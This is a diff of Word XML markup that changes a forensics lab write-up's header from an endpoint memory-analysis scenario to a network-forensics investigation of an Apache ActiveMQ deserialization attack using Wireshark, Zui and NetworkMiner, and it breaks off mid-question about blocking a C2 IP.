           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -90,35 +161,76 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Category:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Endpoint Forensics</w:t>
-      </w:r>
+        <w:t>Category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Forensics</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>Tactics</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -127,32 +239,116 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Tactics:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Stealth, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Discovery</w:t>
-      </w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Initial</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Access, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Execution</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Control</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -161,17 +357,9 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>Tools</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -180,32 +368,80 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Tools:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Volatility</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 3</w:t>
-      </w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Wireshark</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Zui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Miner</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -239,6 +475,7 @@
           </w:rPr>
           <w:t xml:space="preserve"> </w:t>
         </w:r>
+        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -250,6 +487,7 @@
           </w:rPr>
           <w:t>link</w:t>
         </w:r>
+        <w:proofErr w:type="spellEnd"/>
       </w:hyperlink>
     </w:p>
     <w:p>
@@ -270,13 +508,275 @@
         </w:rPr>
         <w:t xml:space="preserve">Kịch bản: </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Reconstruct a multi-stage attack by analyzing Windows memory dumps using Volatility 3, identifying malicious processes, command lines, and correlating findings with threat intelligence.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Investigate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Java</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>deserialization</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Apache</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ActiveMQ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>that</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>enables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>remote</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>code</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>execution</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>through</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>insecure</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>class</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>loading</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -304,17 +804,652 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>By</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identifying</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the C2 IP, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>we</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>block</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>traffic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>this</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IP, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>helping</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
